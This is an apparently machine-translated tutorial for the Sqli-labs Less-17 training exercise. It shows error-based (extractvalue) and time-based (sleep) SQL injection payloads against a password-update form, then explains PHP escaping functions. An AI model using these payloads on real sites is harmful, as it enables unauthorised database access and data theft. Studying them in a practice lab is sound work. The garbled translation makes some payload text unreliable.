Sqli-labs less 17

Less-17

We can see that this is a process of changing the password, using the UPDATE statement, as in the case of select, we only need to close the original and construct our own payload.

Try an error

Username:admin

Password:1 '

You have a error in your SQL syntax; check the manual, corresponds to your MySQL server version for the right SYN Tax to use near 'admin ' on line 1

You can see that the admin ' explains the use of ' in the process of password processing.

This is followed by a blind injection.

This first shows the error type of the blind.

Uname=admin&passwd= one' and Extractvalue (1,concat (0x7e, (select @ @version), 0x7e)) #&submit =submit

Replace @ @version with your clause to make other injections.

Of course, you can also use delay injection, you can also see the time delay of the obvious effect

Uname=admin&passwd= one' and If (ASCII (substr (Database ())) =115,1,sleep (5)) #&submit= Submit

The other way is not demonstrated here. Think for yourself! ~

Question: When looking at the source code, make a SELECT statement first, then why don't we construct it from username?

In fact, we can see a function in the source code. The Check_input () function.

Here we introduce a few functions you will understand.

★ addslashes ()

The Addslashes () function returns a string that adds a backslash before a predefined character.

The predefined characters are:

• Single quotation mark (')
• Double quotation marks (")
• Back slash (\)
• Null

Tip: This function can be used to prepare strings for strings stored in the database as well as database query statements.

Note: By default, PHP automatically runs Addslashes () for all GET, POST, and COOKIE data. So you should not use Addslashes () for a string that has been escaped, because this results in double-layer escaping. You can use the function GET_MAGIC_QUOTES_GPC () to detect this situation.

Syntax: Addslashes (String)

Parameters	Describe
String	Necessary. Specifies the string to be escaped.
return value:	Returns the escaped string.
PHP version:	4 +

★stripslashes ()

The function removes the backslash added by the addslashes () function.

★ mysql_real_escape_string ()

The function escapes special characters in the string used in the SQL statement.

The following characters are affected:

• \x00
• \ n
• \ r
• \
• ‘
• "
• \x1a

If successful, the function returns the escaped string. If it fails, it returns false.

语法：mysql_real_escape_string(string,connection)

Parameters	Describe
String	Necessary. Specifies the string to be escaped.
Connection	Optional. Specify MySQL connection. If not specified, the previous connection is used.

Description: This function escapes special characters in a string and takes into account the current character set of the connection, so it can be used safely for mysql_query ().

In our Less17 check_input (), the username is handled in various escapes, so username can not be used here for injection.

Sqli-labs less 17